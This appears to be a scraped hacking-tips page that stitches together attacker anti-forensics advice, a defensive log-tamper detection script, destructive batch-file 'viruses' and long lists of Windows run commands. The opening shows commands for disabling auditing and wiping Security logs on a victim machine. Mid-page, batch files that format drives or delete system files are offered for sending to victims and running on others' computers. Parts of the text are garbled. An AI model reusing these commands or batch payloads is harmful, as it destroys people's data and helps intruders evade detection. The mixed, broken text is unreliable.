How hackers erase their tracks after hacking

Whenever someone comes in contact with another person, place, or thing, something of that person is left behind.
This means that the attacker must disable logging, clear log files, eliminate evidence, plant additional tools, and cover his tracks.

Here are some of the techniques that an attacker can use to cover his tracks:
(1) Disabling logging – Auditpol was originally included in the NT Resource Kit for administrators. It works well for hackers too, as long as they have administrative access.
Just point it at the victim's system as follows:
C:\>auditpol \\192.168.10 /disable
Auditing Disabled

(2) Clear the log file – The attacker will also attempt to clear the log. Tools such as Winzapper, Evidence Eliminator, or Elsave can be used.
Elsave will remove all entries from the logs, except one entry that shows the logs were cleared.
It is used as follows:

Elsave -s \\192.168.13.10 -l "Security" -C

(3) Cover their tracks – One way for attackers to cover their tracks is with rootkits.
Rootkits are malicious code designed to give an attacker expanded access and hide his presence.
While rootkits were traditionally a Linux tool, they are now starting to make their way into the Windows environment.
Tools such as NTrootkit and AFX Windows rootkits are available for Windows systems.
If you suspect that a computer has been rootkitted, you need to use an MD5 checksum utility or a program such as Tripwire to verify the integrity of your programs. The only other alternative is to rebuild the computer from known good media.
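
Techniques (1) and (2) both leave a trace when event records are forwarded off the host before anyone can tamper with them. The following added example (not part of the original page) scans such forwarded records for audit-policy changes, log-clear records and long silences in the Security channel. The record layout, host and user names, sample data and the 30-minute silence threshold are assumptions made for illustration; the event IDs are the standard Windows ones.

```python
from datetime import datetime, timedelta

# Event IDs that record tampering with auditing itself.
TAMPER_IDS = {
    ("Security", 1102): "security log cleared",
    ("Security", 517): "security log cleared (legacy NT/2000/XP id)",
    ("Security", 4719): "audit policy changed",
    ("Security", 612): "audit policy changed (legacy NT/2000/XP id)",
    ("System", 104): "event log cleared",
}

def find_tampering(events, max_gap=timedelta(minutes=30)):
    """Return (time, host, reason) findings, oldest first."""
    findings = []
    last_security = {}  # host -> time of the previous Security record
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["channel"], ev["id"])
        if key in TAMPER_IDS:
            findings.append((ev["time"], ev["host"],
                             f"{TAMPER_IDS[key]} by {ev['user']}"))
        if ev["channel"] == "Security":
            prev = last_security.get(ev["host"])
            # Heuristic (assumption): a busy host that goes quiet may have
            # had auditing switched off.
            if prev is not None and ev["time"] - prev > max_gap:
                findings.append((ev["time"], ev["host"],
                                 f"no Security events for {ev['time'] - prev}"))
            last_security[ev["host"]] = ev["time"]
    return findings

def make_event(t, channel, eid, user="SYSTEM", host="WS01"):
    return {"time": datetime.fromisoformat(t), "host": host,
            "channel": channel, "id": eid, "user": user}

# Constructed sample records, as a central collector might hold them.
SAMPLE = [
    make_event("2024-01-10T09:00:00", "Security", 4624, "alice"),
    make_event("2024-01-10T09:05:00", "Security", 4719, "admin2"),
    make_event("2024-01-10T09:06:00", "System", 7036),
    make_event("2024-01-10T10:40:00", "Security", 1102, "admin2"),
    make_event("2024-01-10T10:41:00", "Security", 4624, "alice"),
]

if __name__ == "__main__":
    for when, host, reason in find_tampering(SAMPLE):
        print(when.isoformat(), host, reason)
```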

Format or Crash HDD!

Format A:/

Format C:/

Format D:/

Try to kill Harddisk

Boot Failure


Now save your Notepad file as a .bat file and send it to your victim. Once your victim clicks on that .bat file: Dhooooooooommmm!!!!!!!!!!

Viruses for Irritating (please don't try on your PC)

@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe
msg "WARNING:A VIRUS TOOK OVER YOUR COMPUTER VIRUS NOTICED AS:RINSE SHARAN hacked your IP.exe"

Copy these lines in notepad and save it as "rinse.bat" or "rinse.exe"

Try this on any other computer. Very heavy virus.

Run Commands

Power Configuration - powercfg.cpl
Printers and Faxes - control printers
Printers Folder - printers
Private Character Editor - eudcedit
Quicktime (If Installed) - QuickTime.cpl
Quicktime Player (if installed) - quicktimeplayer
Real Player (if installed) - realplay
Regional Settings - intl.cpl
Registry Editor - regedit
Registry Editor - regedt32
Remote Access Phonebook - rasphone
Remote Desktop - mstsc
Removable Storage - ntmsmgr.msc
Removable Storage Operator Requests - ntmsoprq.msc
Resultant Set of Policy (XP Prof) - rsop.msc
Scanners and Cameras - sticpl.cpl
Scheduled Tasks - control schedtasks
Security Center - wscui.cpl
Services - services.msc
Shared Folders - fsmgmt.msc
Shuts Down Windows - shutdown
Sounds and Audio - mmsys.cpl
Spider Solitaire Card Game - spider
SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
System Configuration Utility - msconfig
System File Checker Utility (Scan Immediately) - sfc /scannow
System File Checker Utility (Scan Once At Next Boot) - sfc /scanonce
System File Checker Utility (Scan On Every Boot) - sfc /scanboot
System File Checker Utility (Return to Default Setting) - sfc /revert
System File Checker Utility (Purge File Cache) - sfc /purgecache
System File Checker Utility (Set Cache Size to size x) - sfc /cachesize=x
System Information - msinfo32
System Properties - sysdm.cpl
Task Manager - taskmgr
TCP Tester - tcptest
Telnet Client - telnet
Tweak UI (if installed) - tweakui
User Account Management - nusrmgr.cpl
Utility Manager - utilman

Accessibility Controls- access.cpl
Add Hardware Wizard- hdwwiz.cpl
Add/Remove Programs- appwiz.cpl
Administrative Tools- control admintools
Automatic Updates- wuaucpl.cpl
Bluetooth Transfer Wizard- fsquirt
Calculator- calc
Certificate Manager- certmgr.msc
Character Map- charmap
Check Disk Utility- chkdsk
Clipboard Viewer- clipbrd
Command Prompt- cmd
Component Services- dcomcnfg
Computer Management- compmgmt.msc
timedate.cpl- ddeshare
Device Manager- devmgmt.msc
Direct X Control Panel (If Installed)- directx.cpl
Direct X Troubleshooter- dxdiag
Disk Cleanup Utility- cleanmgr
Disk Defragment- dfrg.msc
Disk Management- diskmgmt.msc
Disk Partition Manager- diskpart
Display Properties- control desktop
Display Properties- desk.cpl
Display Properties (w/Appearance Tab Preselected)- control color
Dr. Watson System Troubleshooting Utility- drwtsn32
Driver Verifier Utility- verifier
Event Viewer- eventvwr.msc
File Signature Verification Tool- sigverif
Findfast- findfast.cpl
Folders Properties- control folders
Fonts- control fonts
Fonts Folder- fonts
Free Cell Card Game- freecell
Game Controllers- joy.cpl
Group Policy Editor (XP Prof)- gpedit.msc
Hearts Card Game- mshearts
Iexpress Wizard- iexpress
Indexing Service- ciadv.msc
Internet Properties- inetcpl.cpl
IP Configuration (Display Connection Configuration)- ipconfig /all
IP Configuration (Display DNS Cache Contents)- ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)- ipconfig /flushdns
IP Configuration (Release All Connections)- ipconfig /release
IP Configuration (Renew All Connections)- ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS)- ipconfig /registerdns
IP Configuration (Display DHCP Class ID)- ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID)- ipconfig /setclassid
Java Control Panel (If Installed)- jpicpl32.cpl
Java Control Panel (If Installed)- javaws
Keyboard Properties- control keyboard
Local Security Settings- secpol.msc
Local Users and Groups- lusrmgr.msc
Logs You Out Of Windows- logoff
Microsoft Chat- winchat
Minesweeper Game- winmine
Mouse Properties- control mouse
Mouse Properties- main.cpl
Network Connections- control netconnections
Network Connections- ncpa.cpl
Network Setup Wizard- netsetup.cpl
Notepad- notepad
Nview Desktop Manager (If Installed)- nvtuicpl.cpl
Object Packager- packager
ODBC Data Source Administrator- odbccp32.cpl
On Screen Keyboard- osk
Opens AC3 Filter (If Installed)- ac3filter.cpl
Password Properties- password.cpl
Performance Monitor- perfmon.msc
Performance Monitor- perfmon
Phone and Modem Options- telephon.cpl

BCKGZM.EXE - Backgammon
CHKRZM.EXE - Checkers
CONF.EXE - NetMeeting
DIALER.EXE - Phone Dialer
HELPCTR.EXE - Help and Support
HRTZZM.EXE - Internet Hearts
HYPERTRM.EXE - HyperTerminal
ICWCONN1.EXE - Internet Connection Wizard
IEXPLORE.EXE - Internet Explorer
INETWIZ.EXE - Setup Your Internet Connection
INSTALL.EXE - User's Folder
MIGWIZ.EXE - File and Settings Transfer Wizard
MOVIEMK.EXE - Windows Movie Maker
MPLAYER2.EXE - Windows Media Player Version 6.4.09.1120
MSCONFIG.EXE - System Configuration Utility
MSIMN.EXE - Outlook Express
MSINFO32.EXE - System Information
MSMSGS.EXE - Windows Messenger
MSN6.EXE - MSN Explorer
PBRUSH.EXE - Paint
PINBALL.EXE - Pinball
RVSEZM.EXE - Reversi
SHVLZM.EXE - Spades
TABLE30.EXE - User's Folder
WAB.EXE - Windows Address Book
WABMIG.EXE - Address Book Import Tool
WINNT32.EXE - User's Folder
WMPLAYER.EXE - Windows Media Player
WRITE.EXE - Wordpad


ACCWIZ.EXE - Accessibility Wizard
CALC.EXE - Calculator
CHARMAP.EXE - Character Map
CLEANMGR.EXE - Disk Space Cleanup Manager
CLICONFG.EXE - SQL Client Configuration Utility
CLIPBRD.EXE - Clipbook Viewer
CLSPACK.EXE - Class Package Export Tool
CMD.EXE - Command Line
CMSTP.EXE - Connection Manager Profile Installer
CONTROL.EXE - Control Panel
DCOMCNFG.EXE - Component Services
DDESHARE.EXE - DDE Share
DRWATSON.EXE - Doctor Watson v1.00b
DRWTSN32.EXE - Doctor Watson Settings
DVDPLAY.EXE - DVD Player
DXDIAG.EXE - DirectX Diagnostics
EUDCEDIT.EXE - Private Character Editor
EVENTVWR.EXE - Event Viewer
EXPLORER.EXE - Windows Explorer
FREECELL.EXE - Free Cell
FXSCLNT.EXE - Fax Console
FXSCOVER.EXE - Fax Cover Page Editor
FXSEND.EXE - MS Fax Send Note Utility
IEXPRESS.EXE - IExpress 2.0
LOGOFF.EXE - System Logoff
MAGNIFY.EXE - Microsoft Magnifier
MMC.EXE - Microsoft Management Console
MOBSYNC.EXE - Microsoft Synchronization Manager
MPLAY32.EXE - Windows Media Player version 5.1
MSHEARTS.EXE - Hearts
MSPAINT.EXE - Paint
MSTSC.EXE - Remote Desktop Connection

NARRATOR.EXE - Microsoft Narrator
NETSETUP.EXE - Network Setup Wizard
NOTEPAD.EXE - Notepad
NSLOOKUP.EXE - NSLookup Application
NTSD.EXE - Symbolic Debugger for Windows 2000
ODBCAD32.EXE - ODBC Data Source Administrator
OSK.EXE - On Screen Keyboard
OSUNINST.EXE - Windows Uninstall Utility
PACKAGER.EXE - Object Packager
PERFMON.EXE - Performance Monitor
PROGMAN.EXE - Program Manager
RASPHONE.EXE - Remote Access Phonebook
REGEDIT.EXE - Registry Editor
REGEDT32.EXE - Registry Editor
RESET.EXE - Resets Session
RSTRUI.EXE - System Restore
RTCSHARE.EXE - RTC Application Sharing
SFC.EXE - System File Checker
SHRPUBW.EXE - Create Shared Folder
SHUTDOWN.EXE - System Shutdown
SIGVERIF.EXE - File Signature Verification
SNDREC32.EXE - Sound Recorder
SNDVOL32.EXE - Sound Volume
SOL.EXE - Solitaire

SPIDER.EXE - Spider Solitaire
SYNCAPP.EXE - Create A Briefcase
SYSEDIT.EXE - System Configuration Editor
SYSKEY.EXE - SAM Lock Tool
TASKMGR.EXE - Task Manager
TELNET.EXE - MS Telnet Client
TSSHUTDN.EXE - System Shutdown
TOURSTART.EXE - Windows Tour Launcher
UTILMAN.EXE - System Utility Manager
USERINIT.EXE - My Documents
VERIFIER.EXE - Driver Verifier Manager
WIAACMGR.EXE - Scanner and Camera Wizard
WINCHAT.EXE - Windows for Workgroups Chat
WINHELP.EXE - Windows Help Engine
WINHLP32.EXE - Help
WINMINE.EXE - Minesweeper
WINVER.EXE - Windows Version Information
WRITE.EXE - WordPad
WSCRIPT.EXE - Windows Script Host Settings
WUPDMGR.EXE - Windows Update


ACCESS.CPL - Accessibility Options
APPWIZ.CPL - Add or Remove Programs
DESK.CPL - Display Properties
HDWWIZ.CPL - Add Hardware Wizard
INETCPL.CPL - Internet Explorer Properties
INTL.CPL - Regional and Language Options
JOY.CPL - Game Controllers
MAIN.CPL - Mouse Properties
MMSYS.CPL - Sounds and Audio Device Properties
NCPA.CPL - Network Connections
NUSRMGR.CPL - User Accounts
ODBCCP32.CPL - ODBC Data Source Administrator
POWERCFG.CPL - Power Options Properties
SYSDM.CPL - System Properties

TELEPHON.CPL - Phone and Modem Options
TIMEDATE.CPL - Date and Time Properties


CERTMGR.MSC - Certificates
CIADV.MSC - Indexing Service
COMPMGMT.MSC - Computer Management
DEVMGMT.MSC - Device Manager
DFRG.MSC - Disk Defragmenter
DISKMGMT.MSC - Disk Management
EVENTVWR.MSC - Event Viewer
FSMGMT.MSC - Shared Folders
LUSRMGR.MSC - Local Users and Groups
NTMSMGR.MSC - Removable Storage
NTMSOPRQ.MSC - Removable Storage Operator Requests
PERFMON.MSC - Performance Monitor
SERVICES.MSC - Services
WMIMGMT.MSC - Windows Management Infrastructure